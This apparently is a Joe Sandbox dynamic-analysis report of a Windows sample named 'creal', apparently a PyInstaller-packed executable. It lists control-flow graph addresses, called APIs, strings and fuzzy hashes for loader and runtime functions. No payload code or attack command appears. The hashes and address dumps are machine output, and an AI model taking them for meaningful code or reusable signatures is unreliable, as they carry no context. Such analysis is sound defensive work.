__free_lconv_num 11 API calls 19378->19379 19379->19377 19380 7ff67a61f258 _findclose 11 API calls 19380->19385 19381 7ff67a619af0 19383 7ff67a619b38 11 API calls 19381->19383 19382 7ff67a620f54 _wfindfirst32i64 37 API calls 19382->19385 19384 7ff67a619af8 19383->19384 19387 7ff67a61b00c __free_lconv_num 11 API calls 19384->19387 19385->19375 19385->19378 19385->19380 19385->19381 19385->19382 19386 7ff67a619b24 19385->19386 19389 7ff67a61b00c __free_lconv_num 11 API calls 19385->19389 19388 7ff67a61afc4 _wfindfirst32i64 17 API calls 19386->19388 19387->19375 19390 7ff67a619b36 19388->19390 19389->19385 19392 7ff67a629509 __crtLCMapStringW 19391->19392 19393 7ff67a627abe 19392->19393 19394 7ff67a61f528 6 API calls 19392->19394 19393->19051 19393->19052 19394->19393 19395 7ff67a60b240 19396 7ff67a60b255 19395->19396 19397 7ff67a60b312 19396->19397 19398 7ff67a61b00c 11 API calls 19396->19398 19398->19397

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 00007FF67A626470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 111 7ff67a626470-7ff67a6264ab call 7ff67a625df8 call 7ff67a625e00 call 7ff67a625e68 118 7ff67a6264b1-7ff67a6264bc call 7ff67a625e08 111->118 119 7ff67a6266d5-7ff67a626721 call 7ff67a61afc4 call 7ff67a625df8 call 7ff67a625e00 call 7ff67a625e68 111->119 118->119 124 7ff67a6264c2-7ff67a6264cc 118->124 144 7ff67a626727-7ff67a626732 call 7ff67a625e08 119->144 145 7ff67a62685f-7ff67a6268cd call 7ff67a61afc4 call 7ff67a621ce8 119->145 126 7ff67a6264ee-7ff67a6264f2 124->126 127 7ff67a6264ce-7ff67a6264d1 124->127 131 7ff67a6264f5-7ff67a6264fd 126->131 129 7ff67a6264d4-7ff67a6264df 127->129 132 7ff67a6264ea-7ff67a6264ec 129->132 133 7ff67a6264e1-7ff67a6264e8 129->133 131->131 135 7ff67a6264ff-7ff67a626512 call 7ff67a61dcbc 131->135 132->126 136 7ff67a62651b-7ff67a626529 132->136 133->129 133->132 141 7ff67a62652a-7ff67a626536 call 7ff67a61b00c 135->141 142 7ff67a626514-7ff67a626516 call 7ff67a61b00c 135->142 152 7ff67a62653d-7ff67a626545 141->152 142->136 144->145 154 7ff67a626738-7ff67a626743 call 7ff67a625e38 144->154 165 7ff67a6268db-7ff67a6268de 145->165 166 7ff67a6268cf-7ff67a6268d6 145->166 152->152 155 7ff67a626547-7ff67a626558 call 7ff67a620f54 152->155 154->145 163 7ff67a626749-7ff67a62676c call 7ff67a61b00c GetTimeZoneInformation 154->163 155->119 164 7ff67a62655e-7ff67a6265b4 call 7ff67a60d1e0 * 4 call 7ff67a62638c 155->164 181 7ff67a626772-7ff67a626793 163->181 182 7ff67a626834-7ff67a62685e call 7ff67a625df0 call 7ff67a625de0 call 7ff67a625de8 163->182 223 7ff67a6265b6-7ff67a6265ba 164->223 168 7ff67a6268e0 165->168 169 7ff67a626915-7ff67a626928 call 7ff67a61dcbc 165->169 171 7ff67a62696b-7ff67a62696e 166->171 173 7ff67a6268e3 168->173 184 7ff67a62692a 169->184 185 7ff67a626933-7ff67a62694e call 7ff67a621ce8 169->185 171->173 174 7ff67a626974-7ff67a62697c call 7ff67a626470 171->174 179 7ff67a6268e8-7ff67a626914 call 7ff67a61b00c call 7ff67a60bdc0 173->179 180 7ff67a6268e3 call 7ff67a6266ec 173->180 174->179 180->179 187 7ff67a62679e-7ff67a6267a5 181->187 188 7ff67a626795-7ff67a62679b 181->188 192 7ff67a62692c-7ff67a626931 call 7ff67a61b00c 184->192 209 7ff67a626950-7ff67a626953 185->209 210 7ff67a626955-7ff67a626967 call 7ff67a61b00c 185->210 194 7ff67a6267a7-7ff67a6267af 187->194 195 7ff67a6267b9 187->195 188->187 192->168 194->195 202 7ff67a6267b1-7ff67a6267b7 194->202 205 7ff67a6267bb-7ff67a62682f call 7ff67a60d1e0 * 4 call 7ff67a6232cc call 7ff67a626984 * 2 195->205 202->205 205->182 209->192 210->171 225 7ff67a6265bc 223->225 226 7ff67a6265c0-7ff67a6265c4 223->226 225->226 226->223 228 7ff67a6265c6-7ff67a6265eb call 7ff67a61716c 226->228 234 7ff67a6265ee-7ff67a6265f2 228->234 236 7ff67a626601-7ff67a626605 234->236 237 7ff67a6265f4-7ff67a6265ff 234->237 236->234 237->236 239 7ff67a626607-7ff67a62660b 237->239 242 7ff67a62660d-7ff67a626635 call 7ff67a61716c 239->242 243 7ff67a62668c-7ff67a626690 239->243 250 7ff67a626637 242->250 251 7ff67a626653-7ff67a626657 242->251 244 7ff67a626697-7ff67a6266a4 243->244 245 7ff67a626692-7ff67a626694 243->245 247 7ff67a6266a6-7ff67a6266bc call 7ff67a62638c 244->247 248 7ff67a6266bf-7ff67a6266ce call 7ff67a625df0 call 7ff67a625de0 244->248 245->244 247->248 248->119 254 7ff67a62663a-7ff67a626641 250->254 251->243 256 7ff67a626659-7ff67a626677 call 7ff67a61716c 251->256 254->251 258 7ff67a626643-7ff67a626651 254->258 263 7ff67a626683-7ff67a62668a 256->263 258->251 258->254 263->243 264 7ff67a626679-7ff67a62667d 263->264 264->243 265 7ff67a62667f 264->265 265->263
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A6264B5
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E1C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67A61AFA3,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61AFCD
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67A61AFA3,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61AFF2
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A6264A4
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E7C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62671A
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62672B
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62673C
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67A62697C), ref: 00007FF67A626763
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                • Opcode ID: bbcac37ccba8d4fb81487e2dc58aab96d0fddb0f5958181c110f5c0263e0c824
                                                                                                                                                                                                                • Instruction ID: 9d3594e3e490629fc97e48bd6a886d47fd45176c23ad9421567f0599cfd2d85b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbcac37ccba8d4fb81487e2dc58aab96d0fddb0f5958181c110f5c0263e0c824
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EED1D06BE2824286E720EF21D8505BB6761EF44F94F408176EA4DC7AE5EF3CE481E741
                                                                                                                                                                                                                Function 00007FF67A6273BC Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 444 7ff67a6273bc-7ff67a62742f call 7ff67a6270f0 447 7ff67a627449-7ff67a627453 call 7ff67a618534 444->447 448 7ff67a627431-7ff67a62743a call 7ff67a6155a4 444->448 454 7ff67a62746e-7ff67a6274d7 CreateFileW 447->454 455 7ff67a627455-7ff67a62746c call 7ff67a6155a4 call 7ff67a6155c4 447->455 453 7ff67a62743d-7ff67a627444 call 7ff67a6155c4 448->453 467 7ff67a62778a-7ff67a6277aa 453->467 458 7ff67a6274d9-7ff67a6274df 454->458 459 7ff67a627554-7ff67a62755f GetFileType 454->459 455->453 464 7ff67a627521-7ff67a62754f GetLastError call 7ff67a615538 458->464 465 7ff67a6274e1-7ff67a6274e5 458->465 461 7ff67a627561-7ff67a62759c GetLastError call 7ff67a615538 CloseHandle 459->461 462 7ff67a6275b2-7ff67a6275b9 459->462 461->453 478 7ff67a6275a2-7ff67a6275ad call 7ff67a6155c4 461->478 470 7ff67a6275bb-7ff67a6275bf 462->470 471 7ff67a6275c1-7ff67a6275c4 462->471 464->453 465->464 472 7ff67a6274e7-7ff67a62751f CreateFileW 465->472 476 7ff67a6275ca-7ff67a62761f call 7ff67a61844c 470->476 471->476 477 7ff67a6275c6 471->477 472->459 472->464 482 7ff67a62763e-7ff67a62766f call 7ff67a626e70 476->482 483 7ff67a627621-7ff67a62762d call 7ff67a6272f8 476->483 477->476 478->453 490 7ff67a627671-7ff67a627673 482->490 491 7ff67a627675-7ff67a6276b7 482->491 483->482 489 7ff67a62762f 483->489 492 7ff67a627631-7ff67a627639 call 7ff67a61b184 489->492 490->492 493 7ff67a6276d9-7ff67a6276e4 491->493 494 7ff67a6276b9-7ff67a6276bd 491->494 492->467 495 7ff67a627788 493->495 496 7ff67a6276ea-7ff67a6276ee 493->496 494->493 498 7ff67a6276bf-7ff67a6276d4 494->498 495->467 496->495 499 7ff67a6276f4-7ff67a627739 CloseHandle CreateFileW 496->499 498->493 501 7ff67a62773b-7ff67a627769 GetLastError call 7ff67a615538 call 7ff67a618674 499->501 502 7ff67a62776e-7ff67a627783 499->502 501->502 502->495
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                                                                                                • Instruction ID: e4c351c60c39d1d868e2ea848d9b0433d703451ff2cd6d0d6c6d242615fd1bd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1C1B037B28A4285EB10CFA8C4906BE3B61FB49F98B115265DB2E9B7E4CF38D455D700
                                                                                                                                                                                                                Function 00007FF67A607960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF67A60154F), ref: 00007FF67A6079F7
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: GetEnvironmentVariableW.KERNEL32(00007FF67A603A1F), ref: 00007FF67A607BAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A607B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67A607BC7
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A617EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A617F05
                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32 ref: 00007FF67A607AB1
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A602B30: MessageBoxW.USER32 ref: 00007FF67A602C05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                • Opcode ID: 58413b646d7f7ab374e4e2c422a9b8d13a7d03e9344dd45300574a9025ad97e3
                                                                                                                                                                                                                • Instruction ID: c7dbc06aa827f557ad7f10d44f813365e9725df644a6c31f45f04c475d075b62
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58413b646d7f7ab374e4e2c422a9b8d13a7d03e9344dd45300574a9025ad97e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE518453B3960345F914FB6698216BB5241AF48FC1F4440B0DD4ECB7F7ED2CE541A640
                                                                                                                                                                                                                Function 00007FF67A6266EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 777 7ff67a6266ec-7ff67a626721 call 7ff67a625df8 call 7ff67a625e00 call 7ff67a625e68 784 7ff67a626727-7ff67a626732 call 7ff67a625e08 777->784 785 7ff67a62685f-7ff67a6268cd call 7ff67a61afc4 call 7ff67a621ce8 777->785 784->785 790 7ff67a626738-7ff67a626743 call 7ff67a625e38 784->790 797 7ff67a6268db-7ff67a6268de 785->797 798 7ff67a6268cf-7ff67a6268d6 785->798 790->785 796 7ff67a626749-7ff67a62676c call 7ff67a61b00c GetTimeZoneInformation 790->796 811 7ff67a626772-7ff67a626793 796->811 812 7ff67a626834-7ff67a62685e call 7ff67a625df0 call 7ff67a625de0 call 7ff67a625de8 796->812 800 7ff67a6268e0 797->800 801 7ff67a626915-7ff67a626928 call 7ff67a61dcbc 797->801 802 7ff67a62696b-7ff67a62696e 798->802 804 7ff67a6268e3 800->804 813 7ff67a62692a 801->813 814 7ff67a626933-7ff67a62694e call 7ff67a621ce8 801->814 802->804 805 7ff67a626974-7ff67a62697c call 7ff67a626470 802->805 809 7ff67a6268e8-7ff67a626914 call 7ff67a61b00c call 7ff67a60bdc0 804->809 810 7ff67a6268e3 call 7ff67a6266ec 804->810 805->809 810->809 816 7ff67a62679e-7ff67a6267a5 811->816 817 7ff67a626795-7ff67a62679b 811->817 820 7ff67a62692c-7ff67a626931 call 7ff67a61b00c 813->820 835 7ff67a626950-7ff67a626953 814->835 836 7ff67a626955-7ff67a626967 call 7ff67a61b00c 814->836 822 7ff67a6267a7-7ff67a6267af 816->822 823 7ff67a6267b9 816->823 817->816 820->800 822->823 829 7ff67a6267b1-7ff67a6267b7 822->829 831 7ff67a6267bb-7ff67a62682f call 7ff67a60d1e0 * 4 call 7ff67a6232cc call 7ff67a626984 * 2 823->831 829->831 831->812 835->820 836->802
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62671A
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E7C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62672B
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E1C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62673C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E4C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67A62697C), ref: 00007FF67A626763
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                • Opcode ID: 111214f05bee2973e4e588afc78e556d255684e42b25d281897c943451d46a64
                                                                                                                                                                                                                • Instruction ID: 35c3367eb9f82a837f484f49fbdacd0c6a47e1d1d89a96bc2af6a840012bf0aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 111214f05bee2973e4e588afc78e556d255684e42b25d281897c943451d46a64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C515C77A2864286E720DF21E8915BB6761FF48F84F4041B6EA4DC3AB6DF3CE541A740
                                                                                                                                                                                                                Function 00007FF67A608B00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                • Opcode ID: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                                                                                                • Instruction ID: b12acf69e032478f8a2770ddfafff4fb5ea513ace66bc73b451a5385ddfb6254
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cbeafd55435480eb4b41ebb52a05d3ef2c4ced4829aa63b63a0783ab33de0ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0A473A3878186F760CF64E489767B3A0EB44F28F004735D6AD466E4DF3CD0589A00
                                                                                                                                                                                                                Function 00007FF67A601710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ff67a601710-7ff67a601724 1 7ff67a60173e-7ff67a601742 0->1 2 7ff67a601726-7ff67a60173d call 7ff67a602b30 0->2 4 7ff67a601744-7ff67a60174d call 7ff67a6012b0 1->4 5 7ff67a601768-7ff67a60178b call 7ff67a607c20 1->5 13 7ff67a60175f-7ff67a601767 4->13 14 7ff67a60174f-7ff67a60175a call 7ff67a602b30 4->14 11 7ff67a60178d-7ff67a6017b8 call 7ff67a602890 5->11 12 7ff67a6017b9-7ff67a6017d4 call 7ff67a603fe0 5->12 20 7ff67a6017ee-7ff67a601801 call 7ff67a610914 12->20 21 7ff67a6017d6-7ff67a6017e9 call 7ff67a602b30 12->21 14->13 27 7ff67a601823-7ff67a601827 20->27 28 7ff67a601803-7ff67a60181e call 7ff67a602890 20->28 26 7ff67a60192f-7ff67a601932 call 7ff67a61028c 21->26 33 7ff67a601937-7ff67a60194e 26->33 30 7ff67a601841-7ff67a601861 call 7ff67a615090 27->30 31 7ff67a601829-7ff67a601835 call 7ff67a601050 27->31 37 7ff67a601927-7ff67a60192a call 7ff67a61028c 28->37 40 7ff67a601863-7ff67a60187d call 7ff67a602890 30->40 41 7ff67a601882-7ff67a601888 30->41 38 7ff67a60183a-7ff67a60183c 31->38 37->26 38->37 49 7ff67a60191d-7ff67a601922 40->49 44 7ff67a601915-7ff67a601918 call 7ff67a61507c 41->44 45 7ff67a60188e-7ff67a601897 41->45 44->49 48 7ff67a6018a0-7ff67a6018c2 call 7ff67a6105dc 45->48 52 7ff67a6018f5-7ff67a6018fc 48->52 53 7ff67a6018c4-7ff67a6018dc call 7ff67a610d1c 48->53 49->37 55 7ff67a601903-7ff67a60190b call 7ff67a602890 52->55 58 7ff67a6018e5-7ff67a6018f3 53->58 59 7ff67a6018de-7ff67a6018e1 53->59 62 7ff67a601910 55->62 58->55 59->48 61 7ff67a6018e3 59->61 61->62 62->44
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                • Opcode ID: 55bd94f6007b30232ed0cfa4e1889d1d4adb7e37d938c4d6b6b55faef1642cfb
                                                                                                                                                                                                                • Instruction ID: 833cfb7f4cd5f491c1eda3dbdc81a3acbaf3d34bdd5bfead69c1e8fca655768c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55bd94f6007b30232ed0cfa4e1889d1d4adb7e37d938c4d6b6b55faef1642cfb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94518EA3B3864286EA11DB25E450ABB6791FF49F94F4404B1DE4C876F5EF3CE684A700
                                                                                                                                                                                                                Function 00007FF67A601AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock$Message
                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
